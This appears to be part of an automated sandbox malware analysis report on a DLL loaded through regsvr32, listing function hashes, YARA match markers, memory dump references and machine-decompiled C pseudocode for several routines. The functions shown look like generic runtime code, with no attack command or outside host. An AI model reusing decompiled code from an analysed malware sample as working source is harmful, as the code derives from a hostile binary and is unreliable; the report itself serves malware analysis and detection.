                                                                              • Instruction ID: 98c6bc6319768c710bec9f07d326650568412bb1450125d44889c08849b13da6
                                                                              • Opcode Fuzzy Hash: c2b620fd709328e5915e9b7e94997b806ce6e095567d9ada10d6dbddd80f238b
                                                                              • Instruction Fuzzy Hash: 5951F5776287D5C6D760CF29E0047AAB7A1F395780F61411AEA8983F68DB7DD441CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000E278 Relevance: .1, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 62b2812e5277d79cf71890da185327c00cb0182960b11156e794a9778dcccdd1
                                                                              • Instruction ID: 96a2ca05932f578597b6f31f20a9b51789f655d9034ffcd243468df0dde1503e
                                                                              • Opcode Fuzzy Hash: 62b2812e5277d79cf71890da185327c00cb0182960b11156e794a9778dcccdd1
                                                                              • Instruction Fuzzy Hash: 8B6108B050424D8FCB99CF28C48A6DA7FE0FB58348F61422DF84AA6250D778D694CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180027C28 Relevance: .1, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0a7e039c7e162bbace75073517b23d1c0edb14752be4eceffb74d3575dc747b7
                                                                              • Instruction ID: e11998f87687b7015f7b025411e2dba788bee123d684f62271b2fcc2a6602c8d
                                                                              • Opcode Fuzzy Hash: 0a7e039c7e162bbace75073517b23d1c0edb14752be4eceffb74d3575dc747b7
                                                                              • Instruction Fuzzy Hash: 74516C3011C7889FD7A9DF28C48A7ABBBF2FB88354F405A1DE4CA83251D775A5468B43
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001ADF8 Relevance: .1, Instructions: 109COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E1001ADF8(signed int __ecx, void* __edi, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8) {
				signed int _v72;
				long long _v80;
				char _v95;
				char _v96;
				intOrPtr _v100;
				char _v104;
				void* _t23;
				intOrPtr _t25;
				intOrPtr _t30;
				signed int _t33;
				void* _t40;
				intOrPtr _t41;
				void* _t42;
				void* _t43;
				intOrPtr _t48;
				signed long long _t54;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr* _t59;
				intOrPtr* _t69;
				signed long long _t71;
				void* _t72;
				intOrPtr* _t79;

				_t72 = __r8;
				_t69 = __rdx;
				_t40 = __edi;
				_t33 = __ecx;
				_t54 =  *0x1006f4c8; // 0x6f13091946cb
				_v72 = _t54 ^ _t71;
				_t43 = r8d;
				_t79 = __rdx;
				r9d = 0;
				r8d = 0;
				_t59 = __rcx;
				_t23 =  *((intOrPtr*)( *__rcx + 0x220))();
				r13d = 1;
				if(_t23 == 0) {
					L2:
					_t5 = _t69 + 0x20; // 0x20
					r8d = _t5;
					E1003A240(_t23, _t33, 0,  &_v104, _t69, _t72);
					_t41 = 0;
					_v80 = 0xffffffff;
					if(_t79 == 0) {
						_v96 = 4;
						if(_t43 <= 0) {
							L17:
							r9d = 0;
							r8d = 0;
							_t25 =  *((intOrPtr*)( *_t59 + 0x220))();
							 *((intOrPtr*)(_t59 + 0x118)) = r13d;
							 *((intOrPtr*)(_t59 + 0xcc)) = _t25;
							L18:
							return E10038D20(_t33, _v72 ^ _t71);
						} else {
							goto L15;
						}
						while(1) {
							L15:
							_t57 =  *_t59;
							 *((intOrPtr*)(_t57 + 0x220))();
							if(_t57 == 0) {
								break;
							}
							_t41 = _t41 + r13d;
							if(_t41 < _t43) {
								continue;
							}
							goto L17;
						}
						L13:
						goto L18;
					}
					_t42 = 0;
					if(_t43 <= 0) {
						goto L17;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t30 =  *_t79;
						_t79 = _t79 + 4;
						_v96 = 4;
						_t48 = _t30;
						_v100 = _t30;
						if(_t48 != 0) {
							_v104 = _t41;
							_v95 = 0;
							_t41 = _t41 + r13d;
						} else {
							_v95 = r13b;
							E10016020(_t59);
							asm("bt eax, 0xb");
							if(_t48 < 0 ||  *0x1006ed20 == 0x40047) {
								_v104 = 6;
							} else {
								_v104 = 8;
							}
						}
						_t58 =  *_t59;
						 *((intOrPtr*)(_t58 + 0x220))();
						if(_t58 == 0) {
							goto L13;
						}
						_t42 = _t42 + r13d;
						if(_t42 < _t43) {
							continue;
						}
						goto L17;
					}
					goto L13;
				} else {
					goto L1;
				}
				do {
					L1:
					r9d = 0;
					r8d = 0;
					_t23 =  *((intOrPtr*)( *__rcx + 0x220))();
					_t40 = _t40 - r13d;
				} while (_t40 != 0);
				goto L2;
			}


























                                                                              0x1001adf8
                                                                              0x1001adf8
                                                                              0x1001adf8
                                                                              0x1001adf8
                                                                              0x1001ae05
                                                                              0x1001ae0f
                                                                              0x1001ae17
                                                                              0x1001ae1a
                                                                              0x1001ae1d
                                                                              0x1001ae20
                                                                              0x1001ae28
                                                                              0x1001ae2b
                                                                              0x1001ae31
                                                                              0x1001ae3c
                                                                              0x1001ae5b
                                                                              0x1001ae62
                                                                              0x1001ae62
                                                                              0x1001ae66
                                                                              0x1001ae6b
                                                                              0x1001ae70
                                                                              0x1001ae79
                                                                              0x1001af0a
                                                                              0x1001af0f
                                                                              0x1001af36
                                                                              0x1001af39
                                                                              0x1001af3c
                                                                              0x1001af47
                                                                              0x1001af4e
                                                                              0x1001af55
                                                                              0x1001af5e
                                                                              0x1001af77
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001af11
                                                                              0x1001af11
                                                                              0x1001af11
                                                                              0x1001af24
                                                                              0x1001af2d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001af2f
                                                                              0x1001af34
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001af34
                                                                              0x1001af04
                                                                              0x00000000
                                                                              0x1001af04
                                                                              0x1001ae7f
                                                                              0x1001ae83
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001ae89
                                                                              0x1001ae89
                                                                              0x1001ae89
                                                                              0x1001ae8d
                                                                              0x1001ae91
                                                                              0x1001ae96
                                                                              0x1001ae98
                                                                              0x1001ae9c
                                                                              0x1001aed1
                                                                              0x1001aed5
                                                                              0x1001aeda
                                                                              0x1001ae9e
                                                                              0x1001aea1
                                                                              0x1001aea6
                                                                              0x1001aeab
                                                                              0x1001aeaf
                                                                              0x1001aec7
                                                                              0x1001aebd
                                                                              0x1001aebd
                                                                              0x1001aebd
                                                                              0x1001aeaf
                                                                              0x1001aedd
                                                                              0x1001aef0
                                                                              0x1001aef9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001aefb
                                                                              0x1001af00
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001af02
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001ae3e
                                                                              0x1001ae3e
                                                                              0x1001ae41
                                                                              0x1001ae44
                                                                              0x1001ae4f
                                                                              0x1001ae56
                                                                              0x1001ae56
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: be6af79fdcaba90beac5d903feac563c956f4a14aea4d05f87adae534efad8e9
                                                                              • Instruction ID: 8286c253bc5fd437c49cbf2f4f5f1696654992f6ef35701ab8188434317b4b17
                                                                              • Opcode Fuzzy Hash: be6af79fdcaba90beac5d903feac563c956f4a14aea4d05f87adae534efad8e9
                                                                              • Instruction Fuzzy Hash: 7F31DFB361468986EB60CB65E804B4F7BD1F78AB98F054238EE494BB45DB39C4C5CB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180023220 Relevance: .1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2a73fccebe1b17c37a08eaad88bc03e676d8e4e44166d1bd6bc2a62feffe697
                                                                              • Instruction ID: 3bfbec68728c413781f4eceae801228648357d86044db0a2bb780f5116396d21
                                                                              • Opcode Fuzzy Hash: c2a73fccebe1b17c37a08eaad88bc03e676d8e4e44166d1bd6bc2a62feffe697
                                                                              • Instruction Fuzzy Hash: 4951B5B190074E8FCB48DFA8D88A5DE7BB1FB48348F04861DE826A7350D3B49564CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004B7E0 Relevance: .1, Instructions: 102COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 91%
                                                                              			E1004B7E0(signed int __eax, unsigned int __ecx, long long __rbx, void* __rcx, intOrPtr* __rdx, void* __rdi, long long __rsi, long long __rbp, long long __r8, void* __r9, void* __r12, void* __r13, void* __r14, void* __r15) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed int _v40;
				char _v68;
				char _v70;
				short _v72;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				char _v104;
				long long _v120;
				signed int _t32;
				intOrPtr _t35;
				unsigned int _t41;
				signed int _t44;
				unsigned int _t45;
				signed int _t48;
				signed long long _t59;
				intOrPtr* _t66;
				intOrPtr* _t69;
				long long* _t75;
				void* _t77;
				long long _t79;
				void* _t82;
				signed long long _t84;
				long long _t85;
				signed long long _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;

				_t95 = __r15;
				_t94 = __r14;
				_t93 = __r13;
				_t92 = __r12;
				_t85 = __r8;
				_t77 = __rdi;
				_t43 = __ecx;
				_t91 = _t84;
				_t59 =  *0x1006f4c8; // 0x6f13091946cb
				_v40 = _t59 ^ _t84;
				 *((long long*)(_t91 - 8)) = __rbx;
				 *((long long*)(_t91 - 0x10)) = __rbp;
				_t82 = __r9;
				 *((long long*)(_t91 - 0x18)) = __rsi;
				_t79 = __r8;
				_t66 = __rdx;
				r8d = r9w & 0xffffffff;
				r9w = r9w & 0x00008000;
				r8w = r8w >> 4;
				_t32 = __eax & 0x000fffff;
				r10d = 0x80000000;
				r8w = r8w & 0x000007ff;
				_t44 = r8w & 0xffffffff;
				if(_t44 != 0) {
					if(_t44 != 0x7ff) {
						r8w = r8w + 0x3c00;
					}
					r8w = 0x7fff;
				}
				if(_t32 != 0 || _t43 != 0) {
					r8w = r8w + 0x3c01;
					r10d = 0;
					_t45 = _t43;
					_t43 = _t43 << 0xb;
					_v88 = _t43;
					_t48 = _t45 >> 0x00000015 | _t32 << 0x0000000b | r10d;
					asm("bt edx, 0x1f");
					_v84 = _t48;
					if(_t48 >= 0) {
						do {
							_t41 = _t43;
							_t43 = _t43 + _t43;
							r8w = r8w + 0xffff;
							_v88 = _t43;
							_t48 = _t48 + _t48 | _t41 >> 0x0000001f;
							asm("bt edx, 0x1f");
						} while (_t48 >= 0);
						_v84 = _t48;
					}
					r9w = r9w | r8w;
					_v80 = r9w;
				} else {
					_v84 = _t43;
					_v88 = _t43;
					_v80 = r9w;
				}
				_t75 =  &_v104;
				_t69 =  &_v88;
				r8d = 0;
				 *_t75 =  *_t69;
				 *((short*)(_t75 + 8)) =  *(_t69 + 8) & 0x0000ffff;
				_t19 = _t85 + 0x11; // 0x11
				_t35 = E1004F8A0(_t19, _t66,  &_v104, _t75, _t77, _t79, _t82, _t85,  &_v72, _t92, _t93, _t94, _t95);
				_t76 = _t82;
				 *((intOrPtr*)(_t66 + 8)) = _t35;
				 *_t66 = _v70;
				 *((intOrPtr*)(_t66 + 4)) = _v72;
				if(E10047020( *_t69, _t66, _t79, _t82, _t77, _t79, _t82,  &_v68) != 0) {
					r9d = 0;
					r8d = 0;
					_t43 = 0;
					_v120 = 0;
					E1003C6F0(0, _t76,  &_v68);
				}
				 *((long long*)(_t66 + 0x10)) = _t79;
				return E10038D20(_t43, _v40 ^ _t84);
			}



































                                                                              0x1004b7e0
                                                                              0x1004b7e0
                                                                              0x1004b7e0
                                                                              0x1004b7e0
                                                                              0x1004b7e0
                                                                              0x1004b7e0
                                                                              0x1004b7e0
                                                                              0x1004b7e0
                                                                              0x1004b7ea
                                                                              0x1004b7f4
                                                                              0x1004b7f9
                                                                              0x1004b7fd
                                                                              0x1004b801
                                                                              0x1004b807
                                                                              0x1004b80b
                                                                              0x1004b815
                                                                              0x1004b818
                                                                              0x1004b820
                                                                              0x1004b826
                                                                              0x1004b82b
                                                                              0x1004b830
                                                                              0x1004b836
                                                                              0x1004b83c
                                                                              0x1004b842
                                                                              0x1004b84a
                                                                              0x1004b84c
                                                                              0x1004b84c
                                                                              0x1004b854
                                                                              0x1004b854
                                                                              0x1004b85d
                                                                              0x1004b873
                                                                              0x1004b879
                                                                              0x1004b87c
                                                                              0x1004b881
                                                                              0x1004b887
                                                                              0x1004b88d
                                                                              0x1004b890
                                                                              0x1004b894
                                                                              0x1004b898
                                                                              0x1004b8a0
                                                                              0x1004b8a0
                                                                              0x1004b8a4
                                                                              0x1004b8a9
                                                                              0x1004b8af
                                                                              0x1004b8b3
                                                                              0x1004b8b5
                                                                              0x1004b8b5
                                                                              0x1004b8bb
                                                                              0x1004b8bb
                                                                              0x1004b8bf
                                                                              0x1004b8c3
                                                                              0x1004b863
                                                                              0x1004b863
                                                                              0x1004b867
                                                                              0x1004b86b
                                                                              0x1004b86b
                                                                              0x1004b8c9
                                                                              0x1004b8ce
                                                                              0x1004b8d3
                                                                              0x1004b8de
                                                                              0x1004b8ea
                                                                              0x1004b8ee
                                                                              0x1004b8f2
                                                                              0x1004b8fc
                                                                              0x1004b8ff
                                                                              0x1004b90a
                                                                              0x1004b911
                                                                              0x1004b923
                                                                              0x1004b925
                                                                              0x1004b928
                                                                              0x1004b92d
                                                                              0x1004b92f
                                                                              0x1004b938
                                                                              0x1004b938
                                                                              0x1004b93d
                                                                              0x1004b968

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f26eeb9ecdbf8aab0caa1149dd1228355a8510cf3b7c374f1c17baa52b504312
                                                                              • Instruction ID: dd35f734098fbc5d9304f9b5d4f05ab764f3d222d9333741e4494af11e398564
                                                                              • Opcode Fuzzy Hash: f26eeb9ecdbf8aab0caa1149dd1228355a8510cf3b7c374f1c17baa52b504312
                                                                              • Instruction Fuzzy Hash: E531C476B18A9486E758CF25E80075EB7A5F784B84FA4903EEB8887B08DF3DC415CB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180014E98 Relevance: .1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                                                              • Instruction ID: 53b90e1c5486c9cc5d3a4e2843fa79abd377b3644fddba8a35b35de5b3b72a9d
                                                                              • Opcode Fuzzy Hash: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                                                              • Instruction Fuzzy Hash: AA51A4B590038E8FCF48DF64C88A5DE7BB1FB48348F014A19E86AA6350D7B4D665CF85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10039DD0 Relevance: .1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E10039DD0(void* __esi, long long __rbx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, intOrPtr* _a40, intOrPtr* _a48, signed long long _a56) {
				long long _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				intOrPtr* _t85;
				signed long long _t90;
				long long _t91;
				signed long long _t95;
				void* _t99;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr* _t102;
				void* _t104;
				signed long long _t107;
				void* _t109;
				void* _t110;

				_t99 = __r8;
				_t91 = __rdi;
				_t56 = __esi;
				_v8 = __rbx;
				_v16 = __rbp;
				_v24 = __rsi;
				_t95 =  *((intOrPtr*)(__rdx + 0xc));
				_v32 = __rdi;
				_v40 = __r12;
				_t104 = __rdx;
				_v48 = __r13;
				_t107 = _a56;
				_t90 = _t107;
				_t57 = r9d;
				_t53 = E1003E910(_t75, __rbx, __rdx, _t90, __rdi, _t95, __rbp, _t100);
				if(__esi == 0) {
					E100403F0(_t75, _t100, _t107, _t109, _t110);
				}
				_t102 = _a48;
				_t101 = _a40;
				 *_t102 = 0xffffffff;
				 *_t101 = 0xffffffff;
				r8d = _t56;
				if(_t56 == 0) {
					L7:
					if(r8d != 0) {
						_t90 = _t75 + _t75 * 4;
						_t75 =  *((intOrPtr*)(_t104 + 0x10));
						_t91 =  *((intOrPtr*)(_t104 + 0x10)) + _t90 * 4 +  *((intOrPtr*)(_t107 + 8));
					}
					_t54 = 0;
					if(_t56 == 0) {
						L22:
						 *_t101 = 0;
						_t47 = 0;
						 *_t102 = 0;
						goto L23;
					} else {
						r8d = 0;
						do {
							_t85 =  *((intOrPtr*)(_t104 + 0x10)) +  *((intOrPtr*)(_t107 + 8)) + _t99;
							if(_t91 == 0 ||  *_t85 >  *((intOrPtr*)(_t91 + 4)) &&  *((intOrPtr*)(_t85 + 4)) <=  *((intOrPtr*)(_t91 + 8))) {
								if(_t57 >=  *_t85 && _t57 <=  *((intOrPtr*)(_t85 + 4))) {
									if( *_t101 == 0xffffffff) {
										 *_t101 = _t54;
									}
									_t34 = _t90 + 1; // 0x1
									 *_t102 = _t34;
								}
							}
							_t54 = _t54 + 1;
							_t99 = _t99 + 0x14;
						} while (_t54 < _t56);
						_t47 =  *_t101;
						if(_t47 == 0xffffffff) {
							goto L22;
						}
						L23:
						return _t47;
					}
				} else {
					_t75 =  *((intOrPtr*)(_t107 + 8));
					_t90 =  *((intOrPtr*)(_t104 + 0x10)) + (_t95 + _t95 * 4) * 4 + _t75 - 0xc;
					while(_t53 <=  *((intOrPtr*)(_t90 - 4)) || _t53 >  *_t90) {
						_t90 = _t90 - 0x14;
						r8d = r8d + 0xffffffff;
						if(r8d != 0) {
							continue;
						}
						goto L7;
					}
					goto L7;
				}
			}


























                                                                              0x10039dd0
                                                                              0x10039dd0
                                                                              0x10039dd0
                                                                              0x10039dd4
                                                                              0x10039dd9
                                                                              0x10039dde
                                                                              0x10039de3
                                                                              0x10039de7
                                                                              0x10039dec
                                                                              0x10039df1
                                                                              0x10039df4
                                                                              0x10039df9
                                                                              0x10039e04
                                                                              0x10039e07
                                                                              0x10039e13
                                                                              0x10039e15
                                                                              0x10039e17
                                                                              0x10039e17
                                                                              0x10039e1e
                                                                              0x10039e26
                                                                              0x10039e2e
                                                                              0x10039e35
                                                                              0x10039e3c
                                                                              0x10039e3f
                                                                              0x10039e6a
                                                                              0x10039e72
                                                                              0x10039e78
                                                                              0x10039e7c
                                                                              0x10039e85
                                                                              0x10039e85
                                                                              0x10039e89
                                                                              0x10039e8d
                                                                              0x10039efe
                                                                              0x10039efe
                                                                              0x10039f05
                                                                              0x10039f07
                                                                              0x00000000
                                                                              0x10039e8f
                                                                              0x10039e8f
                                                                              0x10039ea0
                                                                              0x10039ea9
                                                                              0x10039eaf
                                                                              0x10039ec2
                                                                              0x10039ecd
                                                                              0x10039ecf
                                                                              0x10039ecf
                                                                              0x10039ed2
                                                                              0x10039ed5
                                                                              0x10039ed5
                                                                              0x10039ec2
                                                                              0x10039ed8
                                                                              0x10039edb
                                                                              0x10039edf
                                                                              0x10039ee3
                                                                              0x10039ee9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10039f0e
                                                                              0x10039f2b
                                                                              0x10039f2b
                                                                              0x10039e41
                                                                              0x10039e4e
                                                                              0x10039e52
                                                                              0x10039e57
                                                                              0x10039e60
                                                                              0x10039e64
                                                                              0x10039e68
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10039e68
                                                                              0x00000000
                                                                              0x10039e57

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7126adc895c73f3a206496854ca26f6b24a6fa92f4702e6dc2c03059e38f8c8f
                                                                              • Instruction ID: 5e46189213d00a6b67612845eb3602ff79b09792e22c5dddc22f1cef0d5eb8a9
                                                                              • Opcode Fuzzy Hash: 7126adc895c73f3a206496854ca26f6b24a6fa92f4702e6dc2c03059e38f8c8f
                                                                              • Instruction Fuzzy Hash: 1A41DF73B00F81CACB21CF18D48065EB7B5F785B9AF528212DB694BB54EB35D952CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180018FE8 Relevance: .1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                                                              • Instruction ID: 71fd5f9204d30feec7a15df1bf9f79d56724cbe4fb23e8fa5a2523106a8ad13f
                                                                              • Opcode Fuzzy Hash: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                                                              • Instruction Fuzzy Hash: 2C51B2B080034E9FCB48CFA8D48A4DEBFF0FB58398F245619E859A6250D3749695CFD5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100492B0 Relevance: .1, Instructions: 90COMMONLIBRARYCODECrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E100492B0(signed int __ebx, signed int __ecx, long long __rbx, void* __rcx, signed int __rdx, signed int __rdi, long long __rsi, long long __rbp, signed short* __r8, signed int* __r9, long long __r12, long long __r13, long long __r14, long long __r15, signed int _a8, void* _a32) {
				void* _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				signed long long _v72;
				void* _t29;
				void* _t33;
				signed int _t43;
				signed int _t52;
				signed int _t55;
				signed int _t57;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t65;
				signed long long _t74;
				signed long long _t78;
				intOrPtr* _t80;

				_t83 = __r12;
				_t81 = __r8;
				_t79 = __rbp;
				_t75 = __rsi;
				_t72 = __rdi;
				_t70 = __rdx;
				_t69 = __rcx;
				_t43 = __ebx;
				_a8 = __ecx;
				_t63 = _t80;
				 *((long long*)(_t63 + 0x20)) = __rbx;
				 *((long long*)(_t63 - 8)) = __rsi;
				 *((long long*)(_t63 - 0x10)) = __rdi;
				 *((long long*)(_t63 - 0x18)) = __r12;
				 *((long long*)(_t63 - 0x20)) = __r13;
				 *((long long*)(_t63 - 0x28)) = __r14;
				r12d = r8d;
				_t67 = __ecx;
				_t62 = __ebx - 0xfffffffe;
				if(__ebx != 0xfffffffe) {
					__eflags = __ecx;
					if(__eflags < 0) {
						L10:
						E1003AF70(__eflags, _t63);
						 *_t63 = 0;
						E1003AF40(_t63);
						 *_t63 = 9;
						_v72 = _t72;
						r9d = 0;
						r8d = 0;
						__eflags = 0;
						E1003C790(_t67, _t69, _t70, _t72, _t75, _t79, _t81);
						_t22 = _t72 - 1; // -1
						_t33 = _t22;
						L11:
						return _t33;
					}
					__eflags = __ebx -  *0x10077288;
					if(__eflags >= 0) {
						goto L10;
					}
					_t78 = __ecx >> 5;
					dil = __ebx;
					_t57 = _t55 & 0x0000001f;
					_t74 = __rdi << 6;
					_t64 =  *((intOrPtr*)(0x100772a0 + _t78 * 8));
					__eflags =  *(_t64 + _t74 + 8) & 0x00000001;
					if(__eflags != 0) {
						E1004C9C0(_t29, __ebx, _t57, __ecx, _t74, _t78, __r12, __rdx);
						_t65 =  *((intOrPtr*)(0x100772a0 + _t78 * 8));
						__eflags =  *(_t65 + _t74 + 8) & 0x00000001;
						if(( *(_t65 + _t74 + 8) & 0x00000001) == 0) {
							E1003AF40(_t65);
							 *_t65 = 9;
							E1003AF70(__eflags, _t65);
							__eflags = 0;
							 *_t65 = 0;
							_t59 = 0xffffffff;
						} else {
							r8d = r12d;
							_t59 = E10048AF0(_t43, _t43, _t52, _t67, __rdx, _t74, _t78, __rbp, __r8, __r9, _t83, __rdx, 0x100772a0, __r15);
						}
						E1004CAA0();
						_t33 = _t59;
					} else {
						E1003AF70(__eflags, _t64);
						 *_t64 = 0;
						E1003AF40(_t64);
						 *_t64 = 9;
						_v72 = _t74;
						r9d = 0;
						r8d = 0;
						E1003C790(__ecx, __rcx, __rdx, _t74, _t78, __rbp, __r8);
						_t14 = _t74 - 1; // -1
						_t33 = _t14;
					}
					goto L11;
				}
				E1003AF70(_t62, _t63);
				 *_t63 = 0;
				E1003AF40(_t63);
				 *_t63 = 9;
				_t33 = __ecx + 1;
				goto L11;
			}






















                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b0
                                                                              0x100492b4
                                                                              0x100492bb
                                                                              0x100492bf
                                                                              0x100492c3
                                                                              0x100492c7
                                                                              0x100492cb
                                                                              0x100492cf
                                                                              0x100492d3
                                                                              0x100492d9
                                                                              0x100492dc
